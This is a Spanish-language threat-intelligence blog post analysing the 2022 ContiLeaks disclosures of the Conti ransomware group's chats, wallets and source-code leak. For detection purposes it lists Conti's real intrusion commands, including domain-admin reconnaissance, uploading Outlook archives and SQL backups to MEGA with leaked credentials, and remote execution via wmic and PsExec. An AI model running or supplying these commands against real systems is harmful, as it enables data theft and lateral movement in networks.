Una muestra de apoyo al Gobierno ruso expone datos

Una muestra de apoyo al gobierno de Rusia llevó a la exposición de información clasificada del grupo Conti

Tras el anuncio de apoyo al gobierno ruso por parte del grupo Conti, una persona anónima identificada en twitter únicamente como ContiLeaks declaró su apoyo a Ucrania en la guerra en curso. El 27 de febrero comenzó a filtrar información interna del grupo de ransomware. Se trata de algo más de un año de registros de conversaciones entre sus operadores, víctimas y otras personas de alto perfil, así como detalles técnicos sobre los ataques llevados a cabo y la infraestructura utilizada, cantidades recibidas e incluso direcciones de monederos de criptodivisas, algunos de los cuales aún guardan dinero de los rescates recibidos.

Historia de la conversación

Uno de los materiales más ricos a efectos de inteligencia sobre amenazas son las grabaciones de conversaciones entre miembros del Conti. Su contenido es extenso y aún está siendo analizado, pero ya ha aportado importantes revelaciones, como una posible asociación entre el grupo y el FSB (agencia de inteligencia rusa que sustituyó al KGB).

En abril del año pasado, dos miembros hablaron de un hackeo selectivo a un periodista del grupo Bellingcat, dirigido específicamente a los archivos sobre Alexei Navalny, antiguo opositor político de Vladimir Putin envenenado en agosto de 2020.

"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21]  <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06]  <Mango> Come on)
[21:11:12]  <Johnyboy77> Property
[21:11:13]  <Mango> In general, we work for loot :)
[21:11:20]  <Mango> And fuck from whom to demand it
[21:11:22]  <Johnyboy77> I merged the correspondence of people who are working
against the Russian Federation
[21:11:25]  <Johnyboy77> in the information field
[21:11:31]  <Johnyboy77> But I can not decipher
[21:11:34]  <Johnyboy77> Correspondence of the signal
[21:11:52]  <Johnyboy77> shorter journalists
[21:11:54]  <Mango> I will ask)
[21:11:55]  <Johnyboy77> which are pussy against the Russian Federation
[21:12:04]  <Johnyboy77> current file brooms fucking can not decipher
[21:12:13]  <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while
busy and did not delve)"
[21:21:02]  <Johnyboy77> in short So say
[21:21:08]  <Johnyboy77> And all of his passwords are
[21:21:17]  <Johnyboy77> And she is still Valid
[21:30:56]  <Mango> Well Corresponders at least Zaskrinh them
[21:31:05]  <Mango> Need spectects bro what to say
[21:31:07]  <Johnyboy77> Pink out files
[21:31:12]  <Johnyboy77> navalni FSB

Algún tiempo después, hay un nuevo cargo y se hace referencia a un "jefe":

"Hermano sobre Navalny no se olvide, miré al jefe - que está a la espera de detalles"

Es probable que el artículo en discusión sea Hunting the Hunters: How We Identified Navalny's FSB Stalkers, que detalla cómo el equipo de Bellingcat identificó a los agentes del FSB implicados en la vigilancia y seguimiento de Navalny en el momento de su envenenamiento.

Las conversaciones también revelaron direcciones de monederos bitcoin utilizados por el grupo. Un recuento del grupo vx-underground mostró que entre el 21 de abril de 2017 y el 28 de febrero de 2022, el monedero principal de Conti acumuló unos 2.700 millones de dólares:

Al parecer, el grupo de ransomware aún no ha identificado quién está filtrando sus datos en Twitter. Los registros de chat del 1 de marzo de 2022 muestran la confusión interna:

"ts": "2022-03-01T14:09:27.345914",
"from": "qwerty@q3mcco35auwcstmt.onion",
"to": "cybergangster@q3mcco35auwcstmt.onion",
"body": "Listen, Azim and Smelian wrote me today, they're worried they're
falling over17:09that they've been messing with us17:09what should I tell them?"
"ts": "2022-03-01T16:12:42.619523",
"from": "wind@q3mcco35auwcstmt.onion",
"to": "mango@q3mcco35auwcstmt.onion",
"body": "who leaked, did you find out?{backslash}do you think we'll rebel?"

Curiosamente, el destinatario del segundo mensaje, Mango, es la misma persona implicada en las conversaciones sobre Alexei Navalny en abril de 2021. En las filtraciones hay varias menciones a la herramienta Cobalt Strike. Los comandos y binarios legítimos (LOLbins) asociados a ella se tratan en la siguiente sección.

Huelga de cobalto y LOLbins

Entre las filtraciones publicadas hasta ahora, Conti Rocket Chat Leaks.

7z (7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contiene una serie de exploits de ejecutables legítimos de Windows durante invasiones del grupo Conti. Preste especial atención a los comandos que comienzan por "shell": estos redirigen la entrada al símbolo del sistema de la máquina infectada, lo que los hace muy fáciles de detectar.

No adjuntaremos a este documento el contenido íntegro de dicha filtración, ya que concentra datos de redes internas de víctimas del grupo. Para los interesados en obtener todas las apariciones del uso de Cobalt Strike en el archivo en cuestión, recomendamos el siguiente comando, adaptado de @c3rb3ru5d3d53c:

find . -type f -name ".json" | grep -P '\d+-\d+-\d+..json' | while read i; do
cat $i | jq -r '.mensajes[].msg' | grep 'baliza>'; done

A continuación, algunos comandos relevantes para detectar la actividad de Conti.

CS redirigió los comandos al símbolo del sistema
reg query HKCU2Environment
net localgroup administradores
net grupo "Administradores de dominio" /dom
net grupo "Enterprise admins" /dom
start /b MEGAcmdServer.exe
MEGAclient.exe update -auto=off
MEGAclient.exe inicio de sesión jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
MEGAclient.exe whoami
MEGAclient.exe put -q -ignore-quota-warn "C:\Users*****\DocumentsOutlook Files\ol.7z"
MEGAclient.exe put -q -ignore-quota-warn F:\SQLBackup*.bak
wmic /node:10...* process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
PsExec \* -d -s -h gpupdate /force -accepteula -y -u .local* -p *

Hemos suprimido la información sensible del objetivo en los ejemplos anteriores. Es interesante observar que las buenas prácticas de detección alertarían sobre varios de los comandos enumerados, como el uso de -accepteula para ejecutar herramientas de SysInternals. También es posible ver que Conti utilizó MEGA (antes megaupload) para algunas de sus actividades. No sabemos si este comportamiento se mantiene en las incursiones actuales del grupo.

Código fuente y constructor

El golpe más duro contra el grupo criminal llegó el 1 de marzo, con la filtración del código fuente del ransomware acompañado de su builder (ejecutable utilizado para generar la versión final que se enviará a las víctimas).

Este contenido está protegido por una contraseña que el usuario de ContiLeaks facilitó a un pequeño grupo de investigadores. Poco después se publicó una segunda versión, esta vez sin contraseña, que omitía el código del ransomware y sus principales funciones. Debido a la elección de un protocolo de cifrado obsoleto, fue posible utilizar esta segunda versión para extraer el contenido protegido de la filtración completa. Dentro de ese contenido, el constructor está protegido por una segunda contraseña aún por descubrir.

Es probable que nuevos grupos de ransomware y actores maliciosos poco cualificados aprovechen el código fuente de Conti para generar sus propias versiones de este malware. Por este motivo, no compartiremos dónde obtener la filtración completa ni cómo extraer su contenido sin la contraseña. Los investigadores mínimamente competentes podrán obtener esta información fácilmente.

Conclusión

Se trata de una situación aún en desarrollo. El análisis de tanto material, ya sea en forma de código o de registros de conversaciones, llevará tiempo. Al parecer, el grupo aún no ha descubierto al autor de la filtración y debería seguir publicando información de Conti. Mantendremos a todo el mundo al corriente de nuestra investigación sobre estos materiales, compartiendo toda la información posible con la comunidad de seguridad.

Quienes deseen trabajar directamente con las filtraciones, pueden descargar los archivos comprimidos en hxxps://share[.]vx-underground[.]org/Conti/. Las traducciones al inglés de los materiales están disponibles en las siguientes direcciones de GitHub:

https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished

Por último, las referencias bibliográficas de este informe contienen información adicional. Recomendamos su lectura.

Referencias bibliográficas

https://twitter.com/ContiLeaks/
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/
https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/
https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/
https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/
https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked

Tags: , , ,

Dejar un comentario

Su dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *.

Copyright © 2022 ISH Tecnologia, Todos los derechos reservados.